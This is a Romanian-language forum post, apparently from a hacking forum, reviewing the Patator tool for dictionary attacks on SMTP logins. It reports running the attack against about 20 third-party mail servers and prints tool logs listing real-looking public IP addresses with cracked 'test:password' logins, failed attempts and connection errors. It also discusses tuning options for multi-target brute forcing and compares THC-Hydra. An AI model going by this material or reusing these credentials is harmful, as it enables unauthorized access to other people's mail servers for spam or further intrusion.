Leaderboard

enjoy!

Am testat acest Bruteforce, mai bine spus "Dictionary attack" si pe un singur target cu multi theard merge fara probleme si pe deasupra repede dar pe mai multe targete+theaduri deodata nu mai da randament. Testat pe modulu "smtp_login", multi target(ip,user,password=LIST) + multi theard pe o lista de vreo 20 smtp-uri vulnerabile si verificate inainte de a le baga in "Petator Dictionary attack". Mai jos observam 3 servere de smtp la care a reusit autentificarea cu succes, 1 nereusit, 1 fail si 2 erori care apar incontinu. 05:55:59 patator INFO - 235 25 | 173.9.86.81:test:password | 13 | Authentication successful 05:55:59 patator INFO - 235 32 | 71.146.247.179:test:password | 28 | 2.7.0 Authentication successful. 05:56:02 patator INFO - 235 32 | 79.123.90.202:test:password | 34 | 2.7.0 Authentication successful. 05:56:08 patator INFO - 535 34 | test:admin:173.63.47.19 |123 | 5.7.3 Authentication unsuccessful. 05:56:50 patator INFO - 535 28 | test:admin:99.89.25.201 | 136 | Error: authentication failed 05:56:50 patator INFO - 535 12 | 173.165.33.109:test:password | 7 | auth failure 05:60:30 patator WARNING - xxx | 123.2.170.205:test:password | 1 | <class 'socket.error'>, (110, 'Connection timed out') 05:60:30 patator WARNING - xxx | 87.224.82.83:test:password | 37 | <type 'exceptions.ValueError'>, ('need more than 1 value to unpack',) Nu am pus toata activitatea de la Petator ce s-a desfasurat in timpul atackului deoarece nu are rost, am pus doar ce m-a intersat si este important. Hai sa comentam de exemplu eroarea cu socket. Eroarea 1: Connection timed out. = <class 'socket.error'>, (110, 'Connection timed out') A connection attempt failed because the connected party did not properly respond after a period of time, or the established connection failed because the connected host has failed to respond. Daca nu a reusit stabilirea conexiunii(conectarea pe acel port) din motive diferite, cum ar fi: - a) Smtp Server(port) oprit - Port-ul este blockat - c) Ip-ul este down - Etc. ar fi trebuit sa dea eroarea "auth failure" finca setarea este --failure-delay=10 --max-retries=1 iar smtp-ul functioneaza - Am testat cu un singur target(tot acelasi ip 123.2.170.205) care a primit eroarea de mai sus despre care vorbim si ce sa vedem ? A disparut eroarea cu socket si am primit eroarea cu "auth failure" cum este normal. Daca dam atack pe multi target primim erori. - Observam 1 singur target fara acele erori cu socket. 07:03:24 patator INFO - 535 12 | test:smtp:173.165.33.109 | 1 | auth failure 07:03:26 patator INFO - 535 12 | test:support:173.165.33.109 | 3 | auth failure 07:03:26 patator INFO - 535 12 | test:staff:173.165.33.109 | 2 | auth failure 07:03:28 patator INFO - 535 12 | test:password:173.165.33.109 | 6 | auth failure 07:03:31 patator INFO - 535 12 | test:test:173.165.33.109 | 7 | auth failure 07:03:36 patator INFO - 535 12 | test:backup:173.165.33.109 | 4 | auth failure 07:03:36 patator INFO - 535 12 | test:admin:173.165.33.109 | 8 | auth failure 07:03:41 patator INFO - 535 12 | test:sales:173.165.33.109 | 5 | auth failure Eroarea 2: <type 'exceptions.ValueError'>, ('need more than 1 value to unpack',) Nu are rost sa mai vorbesc despre aceasta eroare si nici nu as avea ce sa spun in privinta ei. Sa punem varianta ca l-au scris gresit si au fost informati despre erorile care provin cand folosim "multi target" dar inca nu le-au rezolvat. Daca trecem cu vederea peste acele erori, tot ramane varianta ca, face atack incredibil de greu pe mai multe targete deodata. 51 secunde a durat pe 1 singur target cu 1 user si 8 parole. Setat=--failure-delay=0.2 --max-retries=1. Pare a nu functiuna, lua in calcul setarea "--failure-delay=secunde". 07:23:35 patator INFO - Starting Patator v0.3 (http://code.google.com/p/patator/) at 2012-01-12 07:23 EET 07:23:35 patator INFO - 07:23:35 patator INFO - code & size | candidate | num | mesg 07:23:35 patator INFO - --------------------------------------------------------------- 07:24:18 patator INFO - 535 12 | test:test:173.165.33.109 | 7 | auth failure 07:24:19 patator INFO - 535 12 | test:admin:173.165.33.109 | 8 | auth failure 07:24:19 patator INFO - 535 12 | test:support:173.165.33.109 | 3 | auth failure 07:24:20 patator INFO - 535 12 | test:backup:173.165.33.109 | 4 | auth failure 07:24:22 patator INFO - 535 12 | test:staff:173.165.33.109 | 2 | auth failure 07:24:24 patator INFO - 535 12 | test:password:173.165.33.109 | 6 | auth failure 07:24:25 patator INFO - 535 12 | test:smtp:173.165.33.109 | 1 | auth failure 07:24:26 patator INFO - 535 12 | test:sales:173.165.33.109 | 5 | auth failure 07:24:26 patator INFO - Hits/Done/Size/Fail: 8/8/8/0, Avg: 0 r/s, Time: 0h 0m [color=red]51s[/color] De aici va dati si voi seama ca nu merita sa faci brute pe multi target atata timp cat pe 1 singur target cu 1 user si 8 parole dureaza 1 min. Astept si parerile voastre cei care l-au testat "multi target+theard-uri" ce rezultat ati capatat. In legatura cu "THC-Hydra" tot pe modulu de smtp si "multi target+theard-uri" are ca rezultat tot un esec ca si acest "Petator - Dictionary attack". Sunt foarte bine gandite si scrise dar mai putin la partea de multi target.